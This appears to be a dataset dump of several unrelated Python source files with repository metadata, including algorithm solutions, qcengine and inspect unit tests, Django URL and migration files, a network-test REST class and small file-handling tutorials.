sim_df = load_simulated_data()
treatment_labels = sim_df.treatment.values
indices = sim_df.post_index.values
all_words = term_counts[indices, :]
treated_sim = sim_df[sim_df.treatment==1]
untreated_sim = sim_df[sim_df.treatment==0]
treated_indices = treated_sim.post_index.values
untreated_indices = untreated_sim.post_index.values
all_outcomes = sim_df.outcome.values
outcomes_st_treated = treated_sim.outcome.values
outcomes_st_not_treated = untreated_sim.outcome.values
words_st_treated = term_counts[treated_indices,:]
words_st_not_treated = term_counts[untreated_indices,:]
treatment_probability = predict_treatment_probability(treatment_labels, all_words)
model_outcome_st_treated = fit_conditional_expected_outcomes(outcomes_st_treated, words_st_treated)
model_outcome_st_not_treated = fit_conditional_expected_outcomes(outcomes_st_not_treated, words_st_not_treated)
expected_outcome_st_treated = predict_expected_outcomes(model_outcome_st_treated, all_words)
expected_outcome_st_not_treated = predict_expected_outcomes(model_outcome_st_not_treated, all_words)
q_hat = psi_q_only(expected_outcome_st_not_treated, expected_outcome_st_treated,
treatment_probability, treatment_labels, all_outcomes, truncate_level=0.03, prob_t=treatment_labels.mean())
tmle = psi_plugin(expected_outcome_st_not_treated, expected_outcome_st_treated,
treatment_probability, treatment_labels, all_outcomes, truncate_level=0.03, prob_t=treatment_labels.mean())
print("Q hat:", q_hat)
print("TMLE:", tmle)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("--dat-dir", action="store", default=None)
parser.add_argument("--sim-dir", action="store", default='../dat/sim/reddit_subreddit_based/')
parser.add_argument("--subs", action="store", default='13,6,8')
parser.add_argument("--mode", action="store", default="simple")
parser.add_argument("--params", action="store", default="1.0,1.0,1.0")
parser.add_argument("--verbose", action='store_true')
args = parser.parse_args()
sim_dir = args.sim_dir
dat_dir = args.dat_dir
subs = None
if args.subs != '':
subs = [int(s) for s in args.subs.split(',')]
verbose = args.verbose
params = args.params.split(',')
sim_setting = 'beta0' + params[0] + '.beta1' + params[1] + '.gamma' + params[2]
subs_string = ', '.join(args.subs.split(','))
mode = args.mode
simulation_file = sim_dir + 'subreddits['+ subs_string + ']/mode' + mode + '/' + sim_setting + ".tsv"
main()
|
[
"[email protected]"
] | |
bf3628287d6912c3ae78c55e67f21dd80313b222
|
b95e71dcc1b42ebf3459ee57bd0119c618a79796
|
/Array/maximum_subarray.py
|
562be03611c865ee216e753a51da805015ca258d
|
[] |
no_license
|
anton-dovnar/LeetCode
|
e47eece7de28d76b0c3b997d4dacb4f151a839b5
|
6ed9e1bd4a0b48e343e1dd8adaebac26a3bc2ed7
|
refs/heads/master
| 2023-06-29T07:21:06.335041 | 2021-07-31T15:08:05 | 2021-07-31T15:08:05 | 361,205,679 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 268 |
py
|
class Solution:
def maxSubArray(self, nums: List[int]) -> int:
max_subarr = float('-inf')
curr_sum = 0
for n in nums:
curr_sum = max(n, curr_sum + n)
max_subarr = max(max_subarr, curr_sum)
return max_subarr
|
[
"[email protected]"
] | |
96302dbfad171e64160534464df2b0add5495106
|
59e613d6a0bcb8570c89defa77da398f69b82c77
|
/qcengine/tests/test_config.py
|
40178a4cfe0e32b0d39d4a31efe3c27904365901
|
[
"LicenseRef-scancode-unknown-license-reference",
"BSD-3-Clause"
] |
permissive
|
ffangliu/QCEngine
|
3e081e7f5e236c434016e222f716e6b34b24030b
|
835b291986069669e4be0e708ec4846ebfd858d6
|
refs/heads/master
| 2020-04-22T23:57:35.470503 | 2019-02-14T16:57:30 | 2019-02-14T16:57:30 | 170,760,404 | 0 | 0 | null | 2019-02-14T21:27:14 | 2019-02-14T21:27:14 | null |
UTF-8
|
Python
| false | false | 5,049 |
py
|
"""
Tests the DQM compute module configuration
"""
import copy
import os
import pydantic
import pytest
import qcengine
from qcengine.testing import environ_context
def test_node_blank():
node = qcengine.config.NodeDescriptor(name="something", hostname_pattern="*")
def test_node_auto():
desc = {
"name": "something",
"hostname_pattern": "*",
"jobs_per_node": 1,
"ncores": 4,
"memory": 10,
"memory_safety_factor": 0,
}
node1 = qcengine.config.NodeDescriptor(**desc)
job1 = qcengine.get_config(hostname=node1)
assert job1.ncores == 4
assert pytest.approx(job1.memory) == 10.0
desc["jobs_per_node"] = 2
node2 = qcengine.config.NodeDescriptor(**desc)
job2 = qcengine.get_config(hostname=node2)
assert job2.ncores == 2
assert pytest.approx(job2.memory) == 5.0
def test_node_environ():
scratch_name = "myscratch1234"
with environ_context({"QCA_SCRATCH_DIR": scratch_name}):
description = {
"name": "something",
"hostname_pattern": "*",
"scratch_directory": "$QCA_SCRATCH_DIR",
}
node = qcengine.config.NodeDescriptor(**description)
assert node.scratch_directory == scratch_name
def test_node_skip_environ():
description = {
"name": "something",
"hostname_pattern": "*",
"scratch_directory": "$RANDOM_ENVIRON",
}
node = qcengine.config.NodeDescriptor(**description)
assert node.scratch_directory is None
@pytest.fixture
def opt_state_basic():
"""
Capture the options state and temporarily override.
"""
# Snapshot env
old_node = copy.deepcopy(qcengine.config.NODE_DESCRIPTORS)
scratch_name = "myscratch1234"
with environ_context({"QCA_SCRATCH_DIR": scratch_name}):
configs = [{
"name": "dragonstooth",
"hostname_pattern": "dt*",
"jobs_per_node": 2,
"ncores": 12,
"memory": 120,
"scratch_directory": "$NOVAR_RANDOM_ABC123"
}, {
"name": "newriver",
"hostname_pattern": "nr*",
"jobs_per_node": 2,
"ncores": 24,
"memory": 240
},
{
"name": "default",
"hostname_pattern": "*",
"jobs_per_node": 1,
"memory": 4,
"memory_safety_factor": 0,
"ncores": 5,
"scratch_directory": "$QCA_SCRATCH_DIR"
}]
for desc in configs:
node = qcengine.config.NodeDescriptor(**desc)
qcengine.config.NODE_DESCRIPTORS[desc["name"]] = node
yield
# Reset env
qcengine.config.NODE_DESCRIPTORS = old_node
def test_node_matching(opt_state_basic):
node = qcengine.config.get_node_descriptor("nomatching")
assert node.name == "default"
node = qcengine.config.get_node_descriptor("dt149")
assert node.name == "dragonstooth"
node = qcengine.config.get_node_descriptor("nr149")
assert node.name == "newriver"
def test_node_env(opt_state_basic):
node = qcengine.config.get_node_descriptor("dt")
assert node.name == "dragonstooth"
assert node.scratch_directory is None
node = qcengine.config.get_node_descriptor("nomatching")
assert node.name == "default"
assert node.scratch_directory == "myscratch1234"
def test_config_default(opt_state_basic):
config = qcengine.config.get_config(hostname="something")
assert config.ncores == 5
assert config.memory == 4
config = qcengine.config.get_config(hostname="dt149")
assert config.ncores == 6
assert pytest.approx(config.memory, 0.1) == 54
def test_config_local_ncores(opt_state_basic):
config = qcengine.config.get_config(hostname="something", local_options={"ncores": 10})
assert config.ncores == 10
assert config.memory == 4
def test_config_local_njobs(opt_state_basic):
config = qcengine.config.get_config(hostname="something", local_options={"jobs_per_node": 5})
assert config.ncores == 1
assert pytest.approx(config.memory) == 0.8
def test_config_local_njob_ncore(opt_state_basic):
config = qcengine.config.get_config(hostname="something", local_options={"jobs_per_node": 3, "ncores": 1})
assert config.ncores == 1
assert pytest.approx(config.memory, 0.1) == 1.33
def test_config_local_njob_ncore(opt_state_basic):
config = qcengine.config.get_config(
hostname="something", local_options={
"jobs_per_node": 3,
"ncores": 1,
"memory": 6
})
assert config.ncores == 1
assert pytest.approx(config.memory, 0.1) == 6
def test_config_validation(opt_state_basic):
with pytest.raises(pydantic.ValidationError):
config = qcengine.config.get_config(hostname="something", local_options={"bad": 10})
def test_global_repr():
assert isinstance(qcengine.config.global_repr(), str)
|
[
"[email protected]"
] | |
25bb1e59fa52a1478f01a27db44ee8ae299b07d2
|
81407be1385564308db7193634a2bb050b4f822e
|
/the-python-standard-library-by-example/subprocess/repeater.py
|
cf01ca41051f6970c677e34642d0326924274e24
|
[
"MIT"
] |
permissive
|
gottaegbert/penter
|
6db4f7d82c143af1209b4259ba32145aba7d6bd3
|
8cbb6be3c4bf67c7c69fa70e597bfbc3be4f0a2d
|
refs/heads/master
| 2022-12-30T14:51:45.132819 | 2020-10-09T05:33:23 | 2020-10-09T05:33:23 | 305,266,398 | 0 | 0 |
MIT
| 2020-10-19T04:56:02 | 2020-10-19T04:53:05 | null |
UTF-8
|
Python
| false | false | 1,421 |
py
|
#!/usr/bin/env python
#
# Copyright 2007 Doug Hellmann.
#
#
# All Rights Reserved
#
# Permission to use, copy, modify, and distribute this software and
# its documentation for any purpose and without fee is hereby
# granted, provided that the above copyright notice appear in all
# copies and that both that copyright notice and this permission
# notice appear in supporting documentation, and that the name of Doug
# Hellmann not be used in advertising or publicity pertaining to
# distribution of the software without specific, written prior
# permission.
#
# DOUG HELLMANN DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE,
# INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS, IN
# NO EVENT SHALL DOUG HELLMANN BE LIABLE FOR ANY SPECIAL, INDIRECT OR
# CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS
# OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT,
# NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN
# CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
#
"""Echo anything written to stdin on stdout.
"""
__module_id__ = "$Id$"
#end_pymotw_header
import sys
sys.stderr.write('repeater.py: starting\n')
sys.stderr.flush()
while True:
next_line = sys.stdin.readline()
if not next_line:
break
sys.stdout.write(next_line)
sys.stdout.flush()
sys.stderr.write('repeater.py: exiting\n')
sys.stderr.flush()
|
[
"[email protected]"
] | |
3f78c466709124429eaedfcbc4849133d80eb1be
|
4c4509c34b57350b605af50600eefc0c24a74255
|
/ecommerce/urls.py
|
0dead703ab3eb8c660305689032883b343a6f140
|
[] |
no_license
|
sayanth123/ecomm
|
cd6dd7e8c3fb13048d35c272379a320c20eb3d24
|
67101ebbb08c82bbd15a7c1dfc22c3da5483e307
|
refs/heads/main
| 2023-05-05T03:20:16.660301 | 2021-05-27T04:21:44 | 2021-05-27T04:21:44 | 370,259,601 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,247 |
py
|
"""ecommerce URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path,include
from ecommerce import settings
from django.conf.urls.static import static
urlpatterns = [
path('admin/', admin.site.urls),
path('ecommerce_app/', include('ecommerceapp.urls')),
path('search_app/', include('search_app.urls')),
path('cart/', include('cart_app.urls')),
]
if settings.DEBUG:
urlpatterns += static(settings.STATIC_URL,
document_root= settings.STATIC_ROOT)
urlpatterns += static(settings.MEDIA_URL,
document_root=settings.MEDIA_ROOT)
#search_app/
#ecommerce_app/
|
[
"[email protected]"
] | |
9170b0b21899081c2505bb3e82a8d26b4391d673
|
d650da884a0a33dd1acf17d04f56d6d22a2287fd
|
/test/test_inspect.py
|
894d8f97bc3c3456e7baeaaca34461ea1c6b61a8
|
[] |
no_license
|
GaelicGrime/rpnpy
|
debe3a79e9a456e13dcd1421d42f01c0bcbe9084
|
5a095dd024403daad93a3222bd190bbb867a8ae2
|
refs/heads/master
| 2023-04-03T11:19:16.737278 | 2020-12-03T08:26:40 | 2020-12-03T08:26:40 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 962 |
py
|
from unittest import TestCase
from math import log
from rpnpy.inspect import countArgs
class TestCountArgs(TestCase):
"""Test the countArgs function"""
def testZero(self):
"A function that takes zero arguments must be processed correctly"
self.assertEqual(0, countArgs(lambda: 3))
def testOne(self):
"A function that takes one argument must be processed correctly"
self.assertEqual(1, countArgs(lambda x: 3))
def testTwo(self):
"A function that takes two arguments must be processed correctly"
self.assertEqual(2, countArgs(lambda x, y: 3))
def testLog(self):
"The signature of math.log can't be inspected (at least in Python 3.7)"
self.assertEqual(None, countArgs(log))
def testLogWithDefault(self):
"""The signature of math.log can't be inspected (at least in Python
3.7). Pass a default value."""
self.assertEqual(3, countArgs(log, 3))
|
[
"[email protected]"
] | |
d09e8cfd12158d7338f73096900aa2f29faece0c
|
09cead98874a64d55b9e5c84b369d3523c890442
|
/py210110c_python1a/day06_210214/homework/hw_5_yiding.py
|
2b8e12eb578a330374112c74a1059c59eddd995b
|
[] |
no_license
|
edu-athensoft/stem1401python_student
|
f12b404d749286036a090e941c0268381ce558f8
|
baad017d4cef2994855b008a756758d7b5e119ec
|
refs/heads/master
| 2021-08-29T15:01:45.875136 | 2021-08-24T23:03:51 | 2021-08-24T23:03:51 | 210,029,080 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 143 |
py
|
"""
1,1
2,1
3,1
4,0
5,0
6,1
7,0.5
8,1
"""
"""
q1.
none, false, else if, for, in, from, as
q2.
abc$, 0a
q3.
a
q4.
c
q5.
a
q6.
a
q7.
a
q8.
a
"""
|
[
"[email protected]"
] | |
7a6ea156514e8fec2c46d6640f4d2fd9b8b57b5d
|
80b7f2a10506f70477d8720e229d7530da2eff5d
|
/ixnetwork_restpy/testplatform/sessions/ixnetwork/traffic/statistics/misdirectedperflow/misdirectedperflow.py
|
0562872acb73fb50d2a0e5450f633d42c7da8502
|
[
"MIT"
] |
permissive
|
OpenIxia/ixnetwork_restpy
|
00fdc305901aa7e4b26e4000b133655e2d0e346a
|
c8ecc779421bffbc27c906c1ea51af3756d83398
|
refs/heads/master
| 2023-08-10T02:21:38.207252 | 2023-07-19T14:14:57 | 2023-07-19T14:14:57 | 174,170,555 | 26 | 16 |
MIT
| 2023-02-02T07:02:43 | 2019-03-06T15:27:20 |
Python
|
UTF-8
|
Python
| false | false | 4,342 |
py
|
# MIT LICENSE
#
# Copyright 1997 - 2020 by IXIA Keysight
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import sys
from ixnetwork_restpy.base import Base
from ixnetwork_restpy.files import Files
if sys.version_info >= (3, 5):
from typing import List, Any, Union
class MisdirectedPerFlow(Base):
"""Display misdirected statistics on a per-flow basis. When active this replaces port level misdirected statistics
The MisdirectedPerFlow class encapsulates a required misdirectedPerFlow resource which will be retrieved from the server every time the property is accessed.
"""
__slots__ = ()
_SDM_NAME = "misdirectedPerFlow"
_SDM_ATT_MAP = {
"Enabled": "enabled",
}
_SDM_ENUM_MAP = {}
def __init__(self, parent, list_op=False):
super(MisdirectedPerFlow, self).__init__(parent, list_op)
@property
def Enabled(self):
# type: () -> bool
"""
Returns
-------
- bool: If true then misdirected per flow statistics will be enabled
"""
return self._get_attribute(self._SDM_ATT_MAP["Enabled"])
@Enabled.setter
def Enabled(self, value):
# type: (bool) -> None
self._set_attribute(self._SDM_ATT_MAP["Enabled"], value)
def update(self, Enabled=None):
# type: (bool) -> MisdirectedPerFlow
"""Updates misdirectedPerFlow resource on the server.
Args
----
- Enabled (bool): If true then misdirected per flow statistics will be enabled
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._update(self._map_locals(self._SDM_ATT_MAP, locals()))
def find(self, Enabled=None):
# type: (bool) -> MisdirectedPerFlow
"""Finds and retrieves misdirectedPerFlow resources from the server.
All named parameters are evaluated on the server using regex. The named parameters can be used to selectively retrieve misdirectedPerFlow resources from the server.
To retrieve an exact match ensure the parameter value starts with ^ and ends with $
By default the find method takes no parameters and will retrieve all misdirectedPerFlow resources from the server.
Args
----
- Enabled (bool): If true then misdirected per flow statistics will be enabled
Returns
-------
- self: This instance with matching misdirectedPerFlow resources retrieved from the server available through an iterator or index
Raises
------
- ServerError: The server has encountered an uncategorized error condition
"""
return self._select(self._map_locals(self._SDM_ATT_MAP, locals()))
def read(self, href):
"""Retrieves a single instance of misdirectedPerFlow data from the server.
Args
----
- href (str): An href to the instance to be retrieved
Returns
-------
- self: This instance with the misdirectedPerFlow resources from the server available through an iterator or index
Raises
------
- NotFoundError: The requested resource does not exist on the server
- ServerError: The server has encountered an uncategorized error condition
"""
return self._read(href)
|
[
"[email protected]"
] | |
006123581571814076c0c5a650ae638e95c97553
|
6fe2d3c27c4cb498b7ad6d9411cc8fa69f4a38f8
|
/algorithms/algorithms-python/leetcode/Question_010_Regular_Expression_Matching.py
|
68ae34c4b6feaa6b7adadbf0450d28621463d895
|
[] |
no_license
|
Lanceolata/code
|
aae54af632a212c878ce45b11dab919bba55bcb3
|
f7d5a7de27c3cc8a7a4abf63eab9ff9b21d512fb
|
refs/heads/master
| 2022-09-01T04:26:56.190829 | 2021-07-29T05:14:40 | 2021-07-29T05:14:40 | 87,202,214 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 695 |
py
|
#!/usr/bin/python
# coding: utf-8
class Solution(object):
def isMatch(self, s, p):
"""
:type s: str
:type p: str
:rtype: bool
"""
if not p:
return not s
m, n = len(s), len(p)
dp = [[False] * (n + 1) for i in range(m + 1)]
dp[m][n] = True
for i in range(m, -1, -1):
for j in range(n - 1, -1, -1):
match = i < m and (s[i] == p[j] or p[j] == '.')
if j + 1 < n and p[j + 1] == '*':
dp[i][j] = dp[i][j + 2] or (match and dp[i + 1][j])
else:
dp[i][j] = match and dp[i + 1][j + 1]
return dp[0][0]
|
[
"[email protected]"
] | |
ee3473b10902f6c6c697639c370c76082fa54da6
|
06919b9fd117fce042375fbd51d7de6bb9ae14fc
|
/py/dcp/problems/graph/find_order.py
|
65b844789e326bb2a11db792095d06afc91af167
|
[
"MIT"
] |
permissive
|
bmoretz/Daily-Coding-Problem
|
0caf2465579e81996869ee3d2c13c9ad5f87aa8f
|
f79e062e9f6e7b18b7e95c071fbe71ad104affcb
|
refs/heads/master
| 2022-12-07T15:41:06.498049 | 2021-11-18T19:45:19 | 2021-11-18T19:45:19 | 226,376,236 | 1 | 0 |
MIT
| 2022-11-22T09:20:23 | 2019-12-06T17:17:00 |
C++
|
UTF-8
|
Python
| false | false | 1,593 |
py
|
'''Topological sort.
We are given a hasmap associating each courseId key with a list of courseIds values, which tells us that the prerequisites of courseId
are course Ids. Return a sorted ordering of courses such that we can complete the curriculum.
Return null if there is no such ordering.
For example, given the following prerequisites:
{
'CSC300' : ['CSC100', 'CSC200'],
'CSC200' : ['CSC100'],
'CSC100' : []
}
You should return ['CSC100', 'CSC200', 'CSC300'].
'''
from collections import deque, defaultdict
def find_order1(courses_to_prereqs : dict):
# Copy list values into a set for faster removal
course_to_prereqs = {c : set(p) for c, p in courses_to_prereqs.items()}
# Start off our list with all courses without prerequisites.
todo = deque([c for c, p in course_to_prereqs.items() if not p])
# Create a new data structure to map prereqs to successor courses.
prereq_to_courses = defaultdict(list)
for course, prereqs in course_to_prereqs.items():
for prereq in prereqs:
prereq_to_courses[prereq].append(course)
result = []
while todo:
prereq = todo.popleft()
result.append(prereq)
# Remove this prereq from all successor courses.
# If any course now does not have any prereqs, add it to todo.
for c in prereq_to_courses[prereq]:
course_to_prereqs[c].remove(prereq)
if not course_to_prereqs[c]:
todo.append(c)
# Circular dependency
if len(result) < len(course_to_prereqs):
return None
return result
|
[
"[email protected]"
] | |
b0ee96afdbb8d940aeeedbe2f8276662709cd207
|
09cead98874a64d55b9e5c84b369d3523c890442
|
/py200913b_python2m8/day06_201018/filedir_4_remove.py
|
0740189b7058ab68253a539e1376c26eddba0f08
|
[] |
no_license
|
edu-athensoft/stem1401python_student
|
f12b404d749286036a090e941c0268381ce558f8
|
baad017d4cef2994855b008a756758d7b5e119ec
|
refs/heads/master
| 2021-08-29T15:01:45.875136 | 2021-08-24T23:03:51 | 2021-08-24T23:03:51 | 210,029,080 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 128 |
py
|
"""
remove dir or file
remove(name)
"""
import os
# os.remove("mydir3a")
# remove a file
os.remove("rename_file_new.py")
|
[
"[email protected]"
] | |
9e673189f7b3663b9f3c1004c0d52e8ed3aec3bb
|
871c8b48a58b3e7dc7821e14bc451acb92dfe33e
|
/cms/migrations/0009_auto_20160308_1456.py
|
e5cf4eb94dfd3f19f01071c28af85f5df2715bea
|
[
"BSD-3-Clause"
] |
permissive
|
sonsandco/djangocms2000
|
6f3937e2185707c32f15e5e42d06e138751d85e4
|
25131e9e8659a7a30a8fd58b7da011cbb928c8ac
|
refs/heads/master
| 2022-08-25T22:18:17.173639 | 2022-08-17T11:36:36 | 2022-08-17T11:36:36 | 121,998,739 | 0 | 0 |
NOASSERTION
| 2022-07-24T05:16:48 | 2018-02-18T23:00:47 |
Python
|
UTF-8
|
Python
| false | false | 1,935 |
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.4 on 2016-03-08 01:56
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('cms', '0008_auto_20150216_1649'),
]
operations = [
migrations.AddField(
model_name='block',
name='language',
field=models.CharField(choices=[('en', 'English'), ('ja', 'Japanese'), ('fr', 'French'), ('es', 'Spanish'), ('pt', 'Portuguese')], default='en-us', max_length=5),
),
migrations.AlterField(
model_name='block',
name='content',
field=models.TextField(blank=True, default=''),
),
migrations.AlterField(
model_name='block',
name='format',
field=models.CharField(choices=[('attr', 'Attribute'), ('plain', 'Plain text'), ('html', 'HTML')], default='plain', max_length=10),
),
migrations.AlterField(
model_name='image',
name='file',
field=models.ImageField(blank=True, upload_to='cms/%y_%m'),
),
migrations.AlterField(
model_name='page',
name='is_live',
field=models.BooleanField(default=True, help_text='If this is not checked, the page will only be visible to logged-in users.'),
),
migrations.AlterField(
model_name='page',
name='template',
field=models.CharField(default='', max_length=255),
),
migrations.AlterField(
model_name='page',
name='url',
field=models.CharField(db_index=True, help_text='e.g. /about/contact', max_length=255, verbose_name='URL'),
),
migrations.AlterUniqueTogether(
name='block',
unique_together=set([('content_type', 'object_id', 'language', 'label')]),
),
]
|
[
"[email protected]"
] | |
7e96884df88998e1cd4b4b6f2f635021055b5322
|
c317f99691f549b393562db200b1e9504ce11f95
|
/algorithms_learn/what_can_be_computed/src/simulateDfa.py
|
efedb724f8a32d4de40d6a61ff15aa0d1e302d68
|
[
"CC-BY-4.0"
] |
permissive
|
RRisto/learning
|
5349f9d3466150dbec0f4b287c13333b02845b11
|
618648f63a09bf946a50e896de8aed0f68b5144a
|
refs/heads/master
| 2023-09-01T00:47:23.664697 | 2023-08-30T17:56:48 | 2023-08-30T17:56:48 | 102,286,332 | 15 | 24 | null | 2023-07-06T21:22:48 | 2017-09-03T18:42:58 |
Jupyter Notebook
|
UTF-8
|
Python
| false | false | 1,135 |
py
|
# SISO program simulateDfa.py
# Simulate a given dfa with a given input.
# dfaString: ASCII description of the dfa M to be simulated
# inString: the initial content I of M's tape
# returns: 'yes' if M accepts I and 'no' otherwise
# Example:
# >>> simulateDfa(rf('multipleOf5.dfa'), '3425735')
# 'yes'
import utils; from utils import rf; from turingMachine import TuringMachine
import re, sys; from dfa import Dfa
def simulateDfa(dfaString, inString):
tm = Dfa(dfaString)
tm.reset(inString)
tmResult = tm.run()
return tmResult
# see testCheckDfa() in checkTuringMachine.py for more detailed tests
def testSimulateDfa():
for (filename, inString, val) in [
('containsGAGA.dfa', 'CCCCCCCCCAAAAAA', 'no'),
('containsGAGA.dfa', 'CCCGAGACCAAAAAA', 'yes'),
('multipleOf5.dfa', '12345', 'yes'),
('multipleOf5.dfa', '1234560', 'yes'),
('multipleOf5.dfa', '123456', 'no'),
]:
result = simulateDfa(rf(filename), inString)
utils.tprint('filename:', filename, 'inString:', inString, 'result:', result)
assert val == result
|
[
"[email protected]"
] | |
e92b6a0a8f15c772f6a3f238232ce0d47afa3a9f
|
ee87e89befa0d4bf353dcf682b6467f9daaf657e
|
/src/foo_ext/setup_foo.py
|
00cab0b82444aae83ea486fa9f58bec6a8b7de40
|
[
"BSD-3-Clause",
"MIT"
] |
permissive
|
umedoblock/fugou
|
43046056ce5f20b81d76e3c8e3149717b63708ed
|
45d95f20bba6f85764fb686081098d92fc8cdb20
|
refs/heads/master
| 2021-07-15T15:26:30.856753 | 2018-11-26T23:44:18 | 2018-11-26T23:44:18 | 152,105,228 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 639 |
py
|
from distutils.core import setup, Extension
# module_camellia = Extension('camellia', sources = ['camellia/pycamellia.c'])
module_foo = \
Extension('_foo',
sources = ['foo/pyfoo.c'],
extra_link_args=['-Wl,-soname,build/lib.linux-i686-3.2-pydebug/_foo.cpython-32dm.so'])
# build/lib.linux-i686-3.2-pydebug/_foo.cpython-32dm.so
# extra_compile_args=[''])
setup( name = 'sample',
version = '0.0',
author = '梅濁酒(umedoblock)',
author_email = '[email protected]',
url = 'empty',
description = 'This is a foo object package',
ext_modules = [module_foo])
|
[
"devnull@localhost"
] |
devnull@localhost
|
ff10aab701873a6743c66ff43a452b141e61b2e3
|
d153c170a4839deb4d8606009be15198418aea69
|
/알고리즘풀이/21.07.09/벽부수고이동.py
|
9a0c96664f8cbc835b7ed167735d13703b0e7b60
|
[] |
no_license
|
rlatmd0829/algorithm
|
669085907e2243b4c3a663feab87cd83ff50cc49
|
116bebf16afa6e20d9e968aa312b99b8eea447a5
|
refs/heads/master
| 2023-08-21T02:27:36.944919 | 2021-09-26T09:39:52 | 2021-09-26T09:39:52 | 345,480,784 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,533 |
py
|
# 시간초과
import collections
n, m = map(int, input().split())
graph = [list(map(int,input())) for _ in range(n)]
dx, dy = [-1,1,0,0], [0,0,-1,1]
def bfs():
queue = collections.deque()
queue.append((0,0))
distance = [[0]*m for _ in range(n)]
while queue:
x, y = queue.popleft()
for i in range(4):
nx = x + dx[i]
ny = y + dy[i]
if 0 <= nx < n and 0 <= ny < m:
if graph[nx][ny] == 0 and distance[nx][ny] == 0:
distance[nx][ny] = distance[x][y] + 1
queue.append((nx,ny))
return distance[n-1][m-1]
result = []
for i in range(n):
for j in range(m):
if graph[i][j] == 1:
graph[i][j] = 0
demo = bfs()
if demo != 0:
result.append(demo)
graph[i][j] = 1
if result:
print(min(result)+1)
else:
print(-1)
##################
from sys import stdin
from collections import deque
N,M = map(int, stdin.readline().split(" "))
map = [list(map(int, stdin.readline().strip())) for _ in range(N)]
# 좌표계산 위한 배열
dx = [-1,1,0,0]
dy = [0,0,1,-1]
curMin = 1000000
def bfs():
global curMin
# 최단경로 저장 배열. 아직 방문 안했다는 표시는 -1로
distances = [[[-1]*2 for _ in range(M)] for _ in range(N)]
# 큐
queue = deque()
queue.append((0,0,0))
distances[0][0][0] = 1
while queue:
x, y, broken = queue.popleft()
for i in range(4):
nx = x + dx[i]
ny = y + dy[i]
if 0 <= nx < N and 0 <= ny <M:
# 부수지 않고 갈 수 있는 경우
if map[nx][ny] == 0 and distances[nx][ny][broken] == -1:
distances[nx][ny][broken] = distances[x][y][broken]+1
queue.append((nx,ny,broken))
# 부숴야만 갈 수 있는 경우
# 지금까지 한번도 안 부쉈어야 한다
# 벽이 있어야 한다
# 방문기록이 없어야 한다
elif broken == 0 and map[nx][ny] == 1 and distances[nx][ny][1] == -1:
distances[nx][ny][1] = distances[x][y][0]+1
queue.append((nx,ny,1))
if distances[N-1][M-1][0] != -1:
curMin = min(curMin, distances[N-1][M-1][0])
if distances[N-1][M-1][1] != -1:
curMin = min(curMin, distances[N-1][M-1][1])
bfs()
if curMin == 1000000:
print(-1)
else:
print(curMin)
|
[
"[email protected]"
] | |
6053712f6528d72f50dd12642f249150218a7d4c
|
651a296c8f45b5799781fd78a6b5329effe702a0
|
/bvec/bvec_print.py
|
a927d2db4dfdd041e9b0fa3dbdc83056ccf7b51a
|
[] |
no_license
|
pdhhiep/Computation_using_Python
|
095d14370fe1a01a192d7e44fcc81a52655f652b
|
407ed29fddc267950e9860b8bbd1e038f0387c97
|
refs/heads/master
| 2021-05-29T12:35:12.630232 | 2015-06-27T01:05:17 | 2015-06-27T01:05:17 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,944 |
py
|
#!/usr/bin/env python
def bvec_print ( n, bvec, title ) :
#*****************************************************************************80
#
## BVEC_PRINT prints a binary integer vector, with an optional title.
#
# Discussion:
#
# A BVEC is an integer vector of binary digits, intended to
# represent an integer. BVEC(1) is the units digit, BVEC(N-1)
# is the coefficient of 2^(N-2), and BVEC(N) contains sign
# information. It is 0 if the number is positive, and 1 if
# the number is negative.
#
# The vector is printed "backwards", that is, the first entry
# printed is BVEC(N).
#
# Licensing:
#
# This code is distributed under the GNU LGPL license.
#
# Modified:
#
# 24 December 2014
#
# Author:
#
# John Burkardt
#
# Parameters:
#
# Input, integer N, the number of components of the vector.
#
# Input, integer BVEC(N), the vector to be printed.
#
